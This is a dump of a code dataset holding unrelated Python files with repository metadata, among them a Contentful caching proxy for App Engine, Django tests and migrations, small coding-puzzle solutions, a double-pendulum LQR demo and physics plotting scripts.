#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import logging
import os
import webapp2
from google.appengine.api import memcache
from google.appengine.api import urlfetch
from google.appengine.ext import ndb
from contentful_proxy.models import files
from contentful_proxy.utils.handlers import storage
from contentful_proxy.utils.handlers import webapp2_base
class CacheHandler(webapp2_base.CustomBaseHandler, storage.CloudClient):
"""Handler which saves a file and returns the file from Google Cloud Storage or from memcache."""
@webapp2.cached_property
def memcache_key(self):
return self.request.path_qs
@webapp2.cached_property
def folder(self):
return self.request.route_kwargs['source_host']
@webapp2.cached_property
def contentful_url(self):
return 'https://{}'.format(self.request.route_kwargs['source_host'])
@webapp2.cached_property
def file_path(self):
return self.request.route_kwargs.get('file_path')
@webapp2.cached_property
def file_path_with_parameters(self):
if self.request.query_string:
file_path_with_parameters = u'{}?{}'.format(self.file_path, self.request.query_string)
else:
file_path_with_parameters = self.file_path
return file_path_with_parameters
@webapp2.cached_property
def file_url(self):
return '{}/{}'.format(self.contentful_url, self.file_path_with_parameters)
def dispatch(self):
"""
Dispatches the request.
If file url is stored in memcache the dispatcher redirects to the memcached file, otherwise it
runs method and set new url to cache.
"""
self.response.headers['Access-Control-Allow-Origin'] = '*'
self.response.headers['Cache-Control'] = 'no-cache'
redirect_url = memcache.get(self.memcache_key)
if redirect_url:
self.redirect(redirect_url, code=303)
else:
super(CacheHandler, self).dispatch()
memcache.set(
self.memcache_key,
self.response.headers['location']
)
def get(self, *args, **kwargs):
"""
Returns file by it's file path.
When file is called first time, file is saved in Google Cloud Storage and its details are saved
in Google Datastore (ndb).
Otherwise, file details are taken from Google Datastore and File is returned from Google Cloud Storage.
Usage:
curl -X GET "https://{domain}.appspot.com/contentful/file_cache/{source_host}/{file_path}
"""
_, file_name = os.path.split(self.file_path)
contentful_file = ndb.Key(files.ContentfulFile, self.file_url).get()
if contentful_file is None:
logging.debug("Image not cached")
response = urlfetch.fetch(self.file_url, deadline=60)
blob = self.store(
file_name=self.file_path_with_parameters + u'/' + file_name,
file_data=response.content,
content_type=response.headers.get('content-type', 'application/octet-stream')
)
blob.make_public()
contentful_file = files.ContentfulFile(
id=self.file_url,
public_url=blob.public_url,
name=blob.name,
memcache_key=self.memcache_key
)
contentful_file.put()
self.redirect(contentful_file.public_url.encode('utf-8'), code=303)
| [
"rivinek@gmail.com"
] | rivinek@gmail.com |
f35a141a6b9327cb830d2aa9efce7a27e0ecb22c | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02797/s548875738.py | 1e4c657afd00f60237371da34c8f737408e516b4 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 197 | py | N,K,S=map(int,input().split())
ans=[]
if S<10**9:
ans=[S for i in range(K)]
ans+=[S+1 for i in range(N-K)]
else:
ans=[S for i in range(K)]
ans+=[1 for i in range(N-K)]
print(*ans) | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
4d27f8a2e3a7a4c655602b958bdd5755afb6049f | ad13583673551857615498b9605d9dcab63bb2c3 | /output/models/nist_data/list_pkg/unsigned_int/schema_instance/nistschema_sv_iv_list_unsigned_int_enumeration_5_xsd/__init__.py | aac688dac1eef59628983e92d248aa85f031d7b3 | [
"MIT"
] | permissive | tefra/xsdata-w3c-tests | 397180205a735b06170aa188f1f39451d2089815 | 081d0908382a0e0b29c8ee9caca6f1c0e36dd6db | refs/heads/main | 2023-08-03T04:25:37.841917 | 2023-07-29T17:10:13 | 2023-07-30T12:11:13 | 239,622,251 | 2 | 0 | MIT | 2023-07-25T14:19:04 | 2020-02-10T21:59:47 | Python | UTF-8 | Python | false | false | 395 | py | from output.models.nist_data.list_pkg.unsigned_int.schema_instance.nistschema_sv_iv_list_unsigned_int_enumeration_5_xsd.nistschema_sv_iv_list_unsigned_int_enumeration_5 import (
NistschemaSvIvListUnsignedIntEnumeration5,
NistschemaSvIvListUnsignedIntEnumeration5Type,
)
__all__ = [
"NistschemaSvIvListUnsignedIntEnumeration5",
"NistschemaSvIvListUnsignedIntEnumeration5Type",
]
| [
"tsoulloftas@gmail.com"
] | tsoulloftas@gmail.com |
ebba29e91a30057168a0cd0f69ce39d84363309c | aa9e472929a1f3f87bbcd5cc272be99a68bf047a | /tuples/find_repeated_items.py | f5ead828d7bb5bb8c756c383020eb510d31fe6c4 | [] | no_license | stradtkt/Python-Exercises | 226706542f88973f77e6f2870b21cd87a278bf2b | 18353443b146ce6e8345fcf618d07de2bae6eb86 | refs/heads/master | 2020-03-19T16:09:51.006809 | 2018-06-30T20:28:34 | 2018-06-30T20:28:34 | 136,703,335 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 155 | py | my_tuple = 2,4,6,2,4,6,5,2,4,6,7
count1 = my_tuple.count(2)
count2 = my_tuple.count(4)
count3 = my_tuple.count(6)
print(count1)
print(count2)
print(count3) | [
"stradtkt22@gmail.com"
] | stradtkt22@gmail.com |
b281272d10fb31464d7d8a0cb4e290739c32189e | 634367d6a94d9bce231a8c29cf9713ebfc4b1de7 | /covid_dashboard/views/get_day_wise_district_details/tests/test_case_02.py | f45bf3a2ba5ff1d48aed35ca3ba4a418dcc8c048 | [] | no_license | saikiranravupalli/covid_dashboard | 5a48c97597983ada36a3bf131edf5ca15f1dedec | 954dd02819fb8f6776fa2828e8971bd55efa657c | refs/heads/master | 2022-11-08T10:11:27.836507 | 2020-06-30T09:00:27 | 2020-06-30T09:00:27 | 269,610,409 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,278 | py | """
# TODO: get_day_wise_district_details with valid district_id returns details
"""
from covid_dashboard.utils.custom_test_utils import CustomTestUtils
from . import APP_NAME, OPERATION_NAME, REQUEST_METHOD, URL_SUFFIX
REQUEST_BODY = """
{}
"""
TEST_CASE = {
"request": {
"path_params": {"district_id": "1"},
"query_params": {},
"header_params": {},
"securities": {"oauth": {"tokenUrl": "http://localhost:8080/o/token", "flow": "password", "scopes": ["read"], "type": "oauth2"}},
"body": REQUEST_BODY,
},
}
class TestCase02GetDayWiseDistrictDetailsAPITestCase(CustomTestUtils):
app_name = APP_NAME
operation_name = OPERATION_NAME
request_method = REQUEST_METHOD
url_suffix = URL_SUFFIX
test_case_dict = TEST_CASE
def setupUser(self, username, password):
super(TestCase02GetDayWiseDistrictDetailsAPITestCase, self).\
setupUser(username=username, password=password)
self.statistics()
def test_case(self):
response = self.default_test_case()
import json
response_content = json.loads(response.content)
self.assert_match_snapshot(
name='get_day_wise_district_details_response',
value=response_content
)
| [
"saikiranravupalli@gmail.com"
] | saikiranravupalli@gmail.com |
5d51b6541ffc22ba6dbade62616ccfd70e03dba4 | e2d22f12f8e540a80d31de9debe775d35c3c5c22 | /blousebrothers/users/migrations/0002_auto_20161009_0739.py | 5caaeef0f9d6ef6321c753470fdeb2432fd49587 | [
"MIT"
] | permissive | sladinji/blousebrothers | 360c3b78ec43379977dbf470e5721e6a695b2354 | 461de3ba011c0aaed3f0014136c4497b6890d086 | refs/heads/master | 2022-12-20T10:24:07.631454 | 2019-06-13T13:17:35 | 2019-06-13T13:17:35 | 66,867,705 | 1 | 0 | NOASSERTION | 2022-12-19T18:15:44 | 2016-08-29T18:04:33 | Python | UTF-8 | Python | false | false | 757 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.7 on 2016-10-09 07:39
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('users', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='user',
name='email',
field=models.EmailField(max_length=254, verbose_name='email address'),
),
migrations.AlterField(
model_name='user',
name='university',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='users.University', verbose_name='Ville de CHU actuelle'),
),
]
| [
"julien.almarcha@gmail.com"
] | julien.almarcha@gmail.com |
bbc0d7036c3b0d1661ec5acc2b80f06806aeda93 | f0d713996eb095bcdc701f3fab0a8110b8541cbb | /L4HM6uMHDCnepz5HK_7.py | d5c57b4d97b416320f6e56898bb1695785da62cf | [] | no_license | daniel-reich/turbo-robot | feda6c0523bb83ab8954b6d06302bfec5b16ebdf | a7a25c63097674c0a81675eed7e6b763785f1c41 | refs/heads/main | 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 401 | py | """
Create a function that takes date in the format **yyyy/mm/dd** as an input and
returns `"Bonfire toffee"` if the date is October 31, else return `"toffee"`.
### Examples
halloween("2013/10/31") ➞ "Bonfire toffee"
halloween("2012/07/31") ➞ "toffee"
halloween("2011/10/12") ➞ "toffee"
### Notes
N/A
"""
halloween=lambda d:"Bonfire "*(d[-5:]=="10/31")+"toffee"
| [
"daniel.reich@danielreichs-MacBook-Pro.local"
] | daniel.reich@danielreichs-MacBook-Pro.local |
e628538fa02d09604b3f2fe873cba3fcd99a1d5c | 80e527f63953a43f7f70112759f27a75d0b25179 | /pytext/data/test/kd_doc_classification_data_handler_test.py | 8d0108c8284547354a1c3e5775a04351fee3bc40 | [
"BSD-3-Clause"
] | permissive | shruti-bh/pytext | 901c195b74a03c6efe965cbfce8fde28560e47db | ae84a5493a5331ac07699d3dfa5b9de521ea85ea | refs/heads/master | 2020-04-22T13:11:20.178870 | 2019-02-12T20:56:34 | 2019-02-12T21:20:25 | 170,400,331 | 1 | 0 | NOASSERTION | 2019-02-12T22:20:47 | 2019-02-12T22:20:47 | null | UTF-8 | Python | false | false | 3,136 | py | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
import unittest
from pytext.config.field_config import FeatureConfig
from pytext.config.kd_doc_classification import ModelInputConfig, Target, TargetConfig
from pytext.data import KDDocClassificationDataHandler
from pytext.data.featurizer import SimpleFeaturizer
from pytext.data.kd_doc_classification_data_handler import ModelInput, RawData
from pytext.utils.test_utils import import_tests_module
tests_module = import_tests_module()
class KDDocClassificationDataHandlerTest(unittest.TestCase):
def setUp(self):
file_name = tests_module.test_file("knowledge_distillation_test_tiny.tsv")
label_config_dict = {"target_prob": True}
data_handler_dict = {
"columns_to_read": [
"text",
"target_probs",
"target_logits",
"target_labels",
"doc_label",
]
}
self.data_handler = KDDocClassificationDataHandler.from_config(
KDDocClassificationDataHandler.Config(**data_handler_dict),
ModelInputConfig(),
TargetConfig(**label_config_dict),
featurizer=SimpleFeaturizer.from_config(
SimpleFeaturizer.Config(), FeatureConfig()
),
)
self.data = self.data_handler.read_from_file(
file_name, self.data_handler.raw_columns
)
def test_create_from_config(self):
expected_columns = [
RawData.TEXT,
RawData.TARGET_PROBS,
RawData.TARGET_LOGITS,
RawData.TARGET_LABELS,
RawData.DOC_LABEL,
]
# check that the list of columns is as expected
self.assertTrue(self.data_handler.raw_columns == expected_columns)
def test_read_from_file(self):
# Check if the data has 10 rows and 5 columns
self.assertEqual(len(self.data), 10)
self.assertEqual(len(self.data[0]), 5)
self.assertEqual(self.data[0][RawData.TEXT], "Who R U ?")
self.assertEqual(
self.data[0][RawData.TARGET_PROBS],
"[-0.005602254066616297, -5.430975914001465]",
)
self.assertEqual(
self.data[0][RawData.TARGET_LABELS], '["cu:other", "cu:ask_Location"]'
)
def test_tokenization(self):
data = list(self.data_handler.preprocess(self.data))
# test tokenization without language-specific tokenizers
self.assertListEqual(data[0][ModelInput.WORD_FEAT], ["who", "r", "u", "?"])
self.assertListEqual(
data[0][Target.TARGET_PROB_FIELD],
[-0.005602254066616297, -5.430975914001465],
)
def test_align_target_label(self):
target = [[0.1, 0.2, 0.3], [0.1, 0.2, 0.3]]
label_list = ["l1", "l2", "l3"]
batch_label_list = [["l3", "l2", "l1"], ["l1", "l3", "l2"]]
align_target = self.data_handler._align_target_label(
target, label_list, batch_label_list
)
self.assertListEqual(align_target, [[0.3, 0.2, 0.1], [0.1, 0.3, 0.2]])
| [
"facebook-github-bot@users.noreply.github.com"
] | facebook-github-bot@users.noreply.github.com |
f83506a11c7bb222bdbd4f3d5c0f18adfbef24c5 | 385ab972316b41cb0643f1050f9220b8eaeb4647 | /cutTheSticks.py | b33dc260c16a89e751d1f3844911ef48097f6cb2 | [] | no_license | Rpratik13/HackerRank | 09174c9b331e25cec33848a80e9109800cdbc894 | 38b9a39261bfb3b2fc208ad1e3d8a485585b419a | refs/heads/master | 2020-03-22T05:24:03.516086 | 2020-01-31T16:08:19 | 2020-01-31T16:08:19 | 139,563,106 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 332 | py | def cutTheSticks(arr):
ans = []
while max(arr)!=0:
while min(arr)==0:
arr.remove(0)
min1 = min(arr)
count = 0
for i in range(0,len(arr)):
arr[i]-=min1
count+=1
ans.append(count)
return ans
n = int(input())
arr = list(map(int, input().rstrip().split()))
result = cutTheSticks(arr)
for i in result:
print(i) | [
"r.pratik013@gmail.com"
] | r.pratik013@gmail.com |
3019e63efae8bf251345dedc6ade8214439b4276 | d9504b779ca6d25a711c13fafc1b8669c60e6f62 | /shape_recognition/libraries/braile_recognition/plotScript.py | 4a9bd429775020ba0b1151785b48933dbe7560e2 | [
"MIT"
] | permissive | ys1998/tactile-shape-recognition | dcdd3f4da66b4b3f6159dccf9cec4d367f6483d9 | b5ab6f1cdf04ff23e14b467a590533e7ee740b52 | refs/heads/master | 2020-03-18T03:01:17.985074 | 2018-07-28T09:46:16 | 2018-07-28T09:46:16 | 134,218,923 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 239 | py | import numpy as np
import matplotlib.pyplot as plt
c = 0
r = 3
s = np.loadtxt('./NewData_BRC/BRC_B5.txt')
taxel = []
for k in range(c,len(s),4):
taxel.append(s[k,r])
print len(taxel)
plt.figure()
plt.plot(taxel)
plt.show()
| [
"yashshah2398@gmail.com"
] | yashshah2398@gmail.com |
8d5a89a05b311b9d5137c404950505cd7eac5bfa | f3f7099576adfb683fb74c575b235bdd6c2900c7 | /examples/demos_by_system/pendulum_double/double_pendulum_with_lqr.py | cda2f8818732a357ed072532029e056e2fe8a0f4 | [
"MIT"
] | permissive | SherbyRobotics/pyro | a1fac4508162aff662c4c6073eb2adf357b1bc8b | baed84610d6090d42b814183931709fcdf61d012 | refs/heads/master | 2023-08-08T16:16:31.510887 | 2023-07-26T17:36:26 | 2023-07-26T17:36:26 | 153,139,985 | 35 | 23 | MIT | 2023-07-26T17:36:27 | 2018-10-15T15:45:09 | Python | UTF-8 | Python | false | false | 801 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun May 24 11:51:18 2020
@author: alex
"""
import numpy as np
from pyro.dynamic.pendulum import DoublePendulum
from pyro.analysis.costfunction import QuadraticCostFunction
from pyro.dynamic.statespace import linearize
from pyro.control.lqr import synthesize_lqr_controller
# Non-linear model
sys = DoublePendulum()
# Linear model
ss = linearize( sys , 0.01 )
# Cost function
cf = QuadraticCostFunction.from_sys( sys )
cf.R[0,0] = 1000
cf.R[1,1] = 10000
# LQR controller
ctl = synthesize_lqr_controller( ss , cf )
# Simulation Closed-Loop Non-linear with LQR controller
cl_sys = ctl + sys
cl_sys.x0 = np.array([0.4,0,0,0])
cl_sys.compute_trajectory()
cl_sys.plot_trajectory('xu')
cl_sys.animate_simulation() | [
"alx87grd@gmail.com"
] | alx87grd@gmail.com |
ea960fdb336509f7286bd45c359d6f34b4776066 | 3d6704216b1acfe1c97048c1999657537596916c | /django_test/users/validators/password.py | 458a8e4d1aacd4add82592ca255529af6447b942 | [] | no_license | jupiny/django_test | e2310ee485e570e92b3f66e7f23dfa8c36a63c58 | b3ef08259177229166e54ede8f7315e2522af438 | refs/heads/master | 2021-01-17T15:46:06.636001 | 2016-11-03T05:27:34 | 2016-11-03T05:27:34 | 59,828,511 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 875 | py | import re
from django.core.exceptions import ValidationError
MINIMUM_LENGTH = 8
def validate_minimum_length(value):
if len(value) < MINIMUM_LENGTH:
raise ValidationError("The password should be at least {0} characters long.".format(MINIMUM_LENGTH))
def validate_letters(value):
# Number
if not re.search(r'[0-9]', value):
raise ValidationError("Password must contain at least 1 digit.")
# Lowercase letters
if not re.search(r'[a-z]', value):
raise ValidationError("Password must contain at least 1 lowercase letter.")
# Uppercase letters
if not re.search(r'[A-Z]', value):
raise ValidationError("Password must contain at least 1 uppercase letter.")
# Special characters
if not re.search(r'[!@#$%^&*+=]', value):
raise ValidationError("Password must contain at least 1 special character.")
| [
"tmdghks584@gmail.com"
] | tmdghks584@gmail.com |
da46a7bd47b78c6f73bfb13edface03d1800cba5 | f0d713996eb095bcdc701f3fab0a8110b8541cbb | /z5zpTucxpMLL72FCx_5.py | 707b3eb2d9448862618c21c90f1fd45b21c4bcb1 | [] | no_license | daniel-reich/turbo-robot | feda6c0523bb83ab8954b6d06302bfec5b16ebdf | a7a25c63097674c0a81675eed7e6b763785f1c41 | refs/heads/main | 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 502 | py | """
Write a function to return the city from each of these vacation spots.
### Examples
grab_city("[Last Day!] Beer Festival [Munich]") ➞ "Munich"
grab_city("Cheese Factory Tour [Portland]") ➞ "Portland"
grab_city("[50% Off!][Group Tours Included] 5-Day Trip to Onsen [Kyoto]") ➞ "Kyoto"
### Notes
There may be additional brackets, but the city will always be in the last
bracket pair.
"""
import re
def grab_city(txt):
return re.findall(r'\[(.*?)\]', txt)[-1]
| [
"daniel.reich@danielreichs-MacBook-Pro.local"
] | daniel.reich@danielreichs-MacBook-Pro.local |
f1910980479f11c5206314612413a19bd533f2d5 | 30f6a276dc667ff8910dd442ddcd7d21198aef58 | /Helicons in Metals/varying_freq_analysis.py | ceb8f7d9db3dd4a1de03630827bd50adf22e6a8e | [] | no_license | ericyeung/PHY424 | 5ddef3b8e95ad253e064736c6da653c7bc260435 | 200ebbed21abbeee5b3e313adfe307d3d7c2068c | refs/heads/master | 2021-05-04T11:46:34.979089 | 2016-08-21T18:37:05 | 2016-08-21T18:37:27 | 49,386,622 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,705 | py | #!/usr/bin/env python
from __future__ import division
from math import *
import matplotlib.pyplot as plt
import numpy as np
from varying_freq_data import *
"""
Plots the resonances
Last updated: November 9
"""
__author__ = "Eric Yeung"
plt.plot(frequency26, pickup26)
plt.errorbar(frequency26, pickup26, ferror26, perror26, fmt='b+', color = 'r')
plt.xlabel('Frequency (Hz)')
plt.ylabel('Amplitude (V)')
#plt.title('For B = 8436.65 G')
plt.annotate('N = 1', xy=(321, 188.92 + 40), xycoords="data", va="center", ha="center", bbox=dict(boxstyle="round", fc="w"))
plt.annotate('N = 3', xy=(2730, 326.2 + 40), xycoords="data", va="center", ha="center", bbox=dict(boxstyle="round", fc="w"))
plt.show()
plt.plot(frequency16, pickup16)
plt.errorbar(frequency16, pickup16, ferror16, perror16, fmt = 'b+', color = 'r')
print np.argmax(pickup16), frequency16[np.argmax(pickup16)] # Outlier?
plt.xlabel('Frequency (Hz)')
plt.ylabel('Amplitude (V)')
#plt.title('For B = 5191.79 G')
plt.annotate('N = 1', xy=(203 + 130, 88.52 + 30), xycoords="data", va="center", ha="center", bbox=dict(boxstyle="round", fc="w"))
plt.annotate('N = 3', xy=(1800, 195.76 + 30), xycoords="data", va="center", ha="center", bbox=dict(boxstyle="round", fc="w"))
plt.show()
plt.plot(frequency10, pickup10)
plt.errorbar(frequency10, pickup10, ferror10, perror10, fmt = 'b+', color = 'r')
plt.xlabel('Frequency (Hz)')
plt.ylabel('Amplitude (V)')
#plt.title('For B = 3244.87 G')
plt.annotate('N = 1', xy=(136, 43.12 + 15), xycoords="data", va="center", ha="center", bbox=dict(boxstyle="round", fc="w"))
plt.annotate('N = 3', xy=(1100 - 20, 115.75 + 20), xycoords="data", va="center", ha="center", bbox=dict(boxstyle="round", fc="w"))
plt.show()
####################################################################################
plt.plot(frequency26, pickup26, color = 'g', label = 'B = 8436.65 G')
plt.errorbar(frequency26, pickup26, ferror26, perror26, fmt='b+', color = 'r')
plt.plot(frequency16, pickup16, color = 'b', label ='B = 5191.79 G')
plt.errorbar(frequency16, pickup16, ferror16, perror16, fmt = 'b+', color = 'black')
plt.plot(frequency10, pickup10, color = 'maroon', label = 'B = 3244.87 G')
plt.errorbar(frequency10, pickup10, ferror10, perror10, fmt = 'b+', color = 'dodgerblue')
plt.xlim([0, 1000])
plt.ylim([0, 250])
freq_ticks = np.arange(0, 1100, 100)
freq_labels = freq_ticks
plt.xlabel('Frequency (Hz)')
plt.xticks(freq_ticks, freq_labels)
plt.ylabel('Amplitude (V)')
#plt.title('n$ = 1$ resonances for Various Magnetic Fields')
plt.legend().draggable()
#plt.savefig('N1_resonance_plot.png', format='png', dpi=1200)
plt.show()
print np.std(frequency26), np.std(frequency16), np.std(frequency10)
| [
"irq.ericyeung@hotmail.com"
] | irq.ericyeung@hotmail.com |
75d11f63a91f6acbedc0504480a733cffdc0e729 | 526b892fa981573f26d55c361b42a9d3fa841db5 | /haas/manage.py | 02a9c9675961e00ed03095bbba46c2c1c4dccfff | [
"BSD-2-Clause",
"BSD-3-Clause"
] | permissive | uranusjr/bbshighlighter | 13d89713245f95906a733b7aa8e7c39c58f6ec22 | da35d483e429e0cbd0619b1bc399f4fe67de9ac3 | refs/heads/master | 2020-05-31T22:36:58.424739 | 2014-03-07T17:24:00 | 2014-03-07T17:24:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 283 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "haas.settings.production")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
| [
"uranusjr@gmail.com"
] | uranusjr@gmail.com |
b5503e5ac0863cea991c31606c9d661a6930e00b | 56f1bb713f0651ac63391349deb81790df14e4b5 | /Pet/pet.py | 53de7eb4272d2f2fdb482b88cb1747a7b250ad3a | [
"CC0-1.0"
] | permissive | rajitbanerjee/kattis | 4cd46a2fe335120b8f53ca71544fc0681474118b | 3a5dd4c84c07e21f09ef45ebd9c1bad2a0adc6ad | refs/heads/master | 2022-05-05T03:19:28.744660 | 2020-08-12T18:48:55 | 2020-08-12T18:48:55 | 192,208,120 | 4 | 2 | CC0-1.0 | 2022-04-15T05:50:16 | 2019-06-16T15:38:15 | Python | UTF-8 | Python | false | false | 227 | py | """https://open.kattis.com/problems/pet"""
sums = []
for i in range(5):
enter = list(map(int, input().split()))
sums.append(sum(enter))
winPoints = max(sums)
winner = sums.index(winPoints) + 1
print(winner, winPoints) | [
"rajit.banerjee@ucdconnect.ie"
] | rajit.banerjee@ucdconnect.ie |
860e8cfb6adb792ded6055048d9bc968e99326b1 | c9f67529e10eb85195126cfa9ada2e80a834d373 | /bin/pycodestyle | df2ddc1147f5cce9be2a239439bea29ab02444b8 | [
"Apache-2.0"
] | permissive | chilung/dllab-5-1-ngraph | 10d6df73ea421bfaf998e73e514972d0cbe5be13 | 2af28db42d9dc2586396b6f38d02977cac0902a6 | refs/heads/master | 2022-12-17T19:14:46.848661 | 2019-01-14T12:27:07 | 2019-01-14T12:27:07 | 165,513,937 | 0 | 1 | Apache-2.0 | 2022-12-08T04:59:31 | 2019-01-13T14:19:16 | Python | UTF-8 | Python | false | false | 255 | #!/home/ccma/n1p1/home/ccma/Chilung/lab5-venv/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from pycodestyle import _main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(_main())
| [
"chilung.cs06g@nctu.edu.tw"
] | chilung.cs06g@nctu.edu.tw | |
721cec5d08493be8d4487e275ec3dac5977eeea6 | fbd4ecf7046171c4e96267c5982c964db54578f5 | /start code/src/Customer.py | 5e8cda2dc0acb09e187f3585b986fb294ad215a5 | [] | no_license | Alvin2580du/alvin_py | 6dddcfbfae214694e9f3dafd976101e681f2a66d | 82d3e9808073f2145b039ccf464c526cb85274e3 | refs/heads/master | 2021-05-05T16:01:43.544783 | 2019-10-29T02:23:59 | 2019-10-29T02:23:59 | 117,328,713 | 12 | 2 | null | 2021-03-20T00:06:37 | 2018-01-13T08:51:49 | Python | UTF-8 | Python | false | false | 1,279 | py | from flask_login import UserMixin
from abc import ABC, abstractmethod
class User(UserMixin, ABC):
__id = -1
def __init__(self, username, password):
self._id = self._generate_id()
self._username = username
self._password = password
@property
def username(self):
return self._username
@property
def is_authenticated(self):
return True
@property
def is_active(self):
return True
@property
def is_anonymous(self):
return False
def get_id(self):
"""Required by Flask-login"""
return str(self._id)
def _generate_id(self):
User.__id += 1
return User.__id
def validate_password(self, password):
return self._password == password
@abstractmethod
def is_admin(self):
pass
class Customer(User):
def __init__(self, username, password, licence):
super().__init__(username, password)
self._licence = licence
def is_admin(self):
return False
def __str__(self):
return f'Customer <name: {self._username}, licence: {self._licence}>'
class Admin(User):
def is_admin(self):
return True
def __str__(self):
return f'Admin <name: {self._username}>'
| [
"ypducdtu@163.com"
] | ypducdtu@163.com |
8829126941188052375e680fa9fb5c24cf8b972b | 17ca5bae91148b5e155e18e6d758f77ab402046d | /Comparsion/compare_Federica_SED_data/compare_result.py | c3a371fd9726be0f5a55285fd4ac2f393152474a | [] | no_license | dartoon/QSO_decomposition | 5b645c298825091c072778addfaab5d3fb0b5916 | a514b9a0ad6ba45dc9c3f83abf569688b9cf3a15 | refs/heads/master | 2021-12-22T19:15:53.937019 | 2021-12-16T02:07:18 | 2021-12-16T02:07:18 | 123,425,150 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,456 | py | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Thu May 9 14:00:30 2019
@author: Dartoon
Comparing the fitting between Xuheng and Federica
"""
import numpy as np
import astropy.io.fits as pyfits
import matplotlib.pyplot as plt
import sys
sys.path.insert(0,'../../py_tools')
from load_result import load_host_p, load_err
ID = ['CID1174', 'CID1281', 'CID206', 'CID216', 'CID237', 'CID255', 'CID3242',
'CID3570', 'CID452', 'CID454', 'CID50', 'CID543', 'CID597', 'CID607',
'CID70', 'LID1273', 'LID1538', 'LID360', 'XID2138', 'XID2202', 'XID2396',
'CDFS-1', 'CDFS-229', 'CDFS-321', 'CDFS-724', 'ECDFS-358', 'SXDS-X1136',
'SXDS-X50', 'SXDS-X717', 'SXDS-X735', 'SXDS-X763', 'SXDS-X969']
Mstar = load_host_p(ID=ID, folder='../../')[1]
Mstar_err = load_err(prop = 'Mstar', ID=ID)
LR = load_host_p(ID=ID, folder='../../', dm = 0)[0] #!!! This dm is important
LR_err = load_err(prop = 'LR', ID=ID)
Fede = np.loadtxt('Summary.txt') #0ID 1M*_SED 2M*_IMAGEDEC 3LR_SED 4LR_IMAGEDEC 5agreement
bool = [Fede[:,3]!=-99] #exclude CID255 at this moment
#%%
plt.figure(figsize=(10, 10))
x = np.linspace(8., 12, 20)
y = x
plt.plot(x,y, 'gray', alpha=0.5)
#plt.plot(LR[bool], Fede[:,3][bool], 'bo', label='SED only')
plt.errorbar(LR[bool], Fede[:,3][bool], xerr=[np.abs(LR_err)[:,0][bool], np.abs(LR_err)[:,1][bool]],yerr=0.2 + np.zeros(len(Mstar[bool])),fmt='.',color='blue',markersize=15, label='SED only')
#plt.plot(LR[bool], Fede[:,4][bool], 'r^', label='fix HST result')
plt.xlim([8.8,11.8])
plt.ylim([8.8,11.8])
plt.title("Comparsion of LR",fontsize=35)
plt.xlabel("Xuheng log$(L_R/L_{\odot})$",fontsize=35)
plt.ylabel("Federica log$(L_R/L_{\odot})$",fontsize=35)
plt.grid(linestyle='--')
plt.tick_params(labelsize=25)
#plt.legend(prop={'size':20})
plt.show()
#%%
plt.figure(figsize=(10, 10))
x = np.linspace(8.5, 12.5, 20)
y = x
plt.plot(x,y, 'gray', alpha=0.5)
plt.errorbar(Mstar[bool], Fede[:,1][bool], xerr=[np.abs(Mstar_err)[:,0][bool], np.abs(Mstar_err)[:,1][bool]],yerr=0.3 + np.zeros(len(Mstar[bool])),fmt='.',color='blue',markersize=15, label='SED only')
#plt.plot(Mstar[bool], Fede[:,2][bool], 'r^', label='fix HST result')
plt.xlim([8.5,12.5])
plt.ylim([8.5,12.5])
plt.title("Comparsion of M*",fontsize=35)
plt.xlabel("Xuheng log$(M_*/M_{\odot})$",fontsize=35)
plt.ylabel("Federica log$(M_*/M_{\odot})$", fontsize=35)
plt.grid(linestyle='--')
plt.tick_params(labelsize=25)
#plt.legend(prop={'size':20})
plt.show() | [
"dingxuheng@mail.bnu.edu.cn"
] | dingxuheng@mail.bnu.edu.cn |
